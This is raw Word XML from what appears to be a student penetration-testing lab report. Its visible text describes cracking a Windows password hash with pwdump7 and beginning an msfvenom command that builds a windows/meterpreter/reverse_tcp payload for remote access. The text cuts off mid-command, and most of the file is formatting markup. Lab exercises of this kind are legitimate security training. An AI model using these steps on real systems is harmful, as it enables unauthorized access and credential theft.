            <w:r w:rsidR="00C94921" w:rsidRPr="00196FF6">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>login username</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C94921" w:rsidRPr="00196FF6" w:rsidRDefault="00C94921" w:rsidP="00C94921">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>
              </w:numPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00196FF6">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>windows login password</w:t>
            </w:r>
            <w:r w:rsidR="00C416A1" w:rsidRPr="00196FF6">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C94921" w:rsidRPr="00196FF6" w:rsidRDefault="00C94921" w:rsidP="00C94921">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="780"/>
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00A715A6" w:rsidRPr="00196FF6" w:rsidRDefault="00196FF6" w:rsidP="00C94921">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00196FF6">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>I then went on to use a tool such as pwdump7 to crack the hash file to show that alternate file hash cracking tools could demonstrate the same behaviour:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00196FF6" w:rsidRPr="00196FF6" w:rsidRDefault="00196FF6" w:rsidP="00C94921">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00A715A6">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00A715A6"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="336" w:lineRule="auto"/>
        <w:ind w:right="9385"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="237" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="132" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">From our previous lab, (redo the same tasks) using Metasploit and MSVENOM to gain access to remote desktop connection. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="237" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="3" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">(As this lab is already completed, the description is very short. If you need clarification, please refer to our previous lab work) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5124923" cy="8040929"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="9468" name="Group 9468"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5124923" cy="8040929"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5124923" cy="8040929"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="9463" name="Rectangle 9463"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="520479" cy="290255"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                  <w:u w:val="single" w:color="000000"/>
                                </w:rPr>
                                <w:t xml:space="preserve">Task </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="9462" name="Rectangle 9462"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="390144" y="0"/>
                            <a:ext cx="112728" cy="290255"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                  <w:u w:val="single" w:color="000000"/>
                                </w:rPr>
                                <w:t>2</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="9466" name="Rectangle 9466"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="475488" y="0"/>
                            <a:ext cx="67498" cy="290255"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                  <w:u w:val="single" w:color="000000"/>
                                </w:rPr>
                                <w:t>:</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="9467" name="Rectangle 9467"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="525780" y="0"/>
                            <a:ext cx="486021" cy="290255"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                  <w:u w:val="single" w:color="000000"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> Use </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="9464" name="Rectangle 9464"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="891540" y="5791"/>
                            <a:ext cx="2904767" cy="282553"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:b/>
                                  <w:i/>
                                  <w:sz w:val="24"/>
                                  <w:u w:val="single" w:color="000000"/>
                                </w:rPr>
                                <w:t>MSFVENOM to create Payload</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="9465" name="Rectangle 9465"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3073908" y="0"/>
                            <a:ext cx="56314" cy="290255"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="833" name="Rectangle 833"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="251460"/>
                            <a:ext cx="56314" cy="290255"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="11588" name="Shape 11588"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="445922"/>
                            <a:ext cx="5082540" cy="175260"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="5082540" h="175260">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="5082540" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5082540"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835" name="Rectangle 835"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="426720"/>
                            <a:ext cx="2300115" cy="290255"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                              <w:proofErr w:type="spellStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>kali@kali</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t xml:space="preserve">:~$ </w:t>
                              </w:r>
                              <w:proofErr w:type="spellStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>msfvenom</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="836" name="Rectangle 836"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1729741" y="426720"/>
                            <a:ext cx="67498" cy="290255"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>-</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="837" name="Rectangle 837"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1780032" y="426720"/>
                            <a:ext cx="3471695" cy="290255"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>p</w:t>
                              </w:r>
                              <w:proofErr w:type="gramEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> windows/</w:t>
                              </w:r>
                              <w:proofErr w:type="spellStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>meterpreter</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>/</w:t>
                              </w:r>
                              <w:proofErr w:type="spellStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>reverse_tcp</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="838" name="Rectangle 838"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4389136" y="426720"/>
                            <a:ext cx="112728" cy="290255"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>–</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="839" name="Rectangle 839"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4474464" y="426720"/>
                            <a:ext cx="865110" cy="290255"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>platform</w:t>
                              </w:r>
                              <w:proofErr w:type="gramEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="11589" name="Shape 11589"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="621182"/>
                            <a:ext cx="3720084" cy="175260"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="3720084" h="175260">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="3720084" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3720084"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841" name="Rectangle 841"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="601980"/>
                            <a:ext cx="913736" cy="290255"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
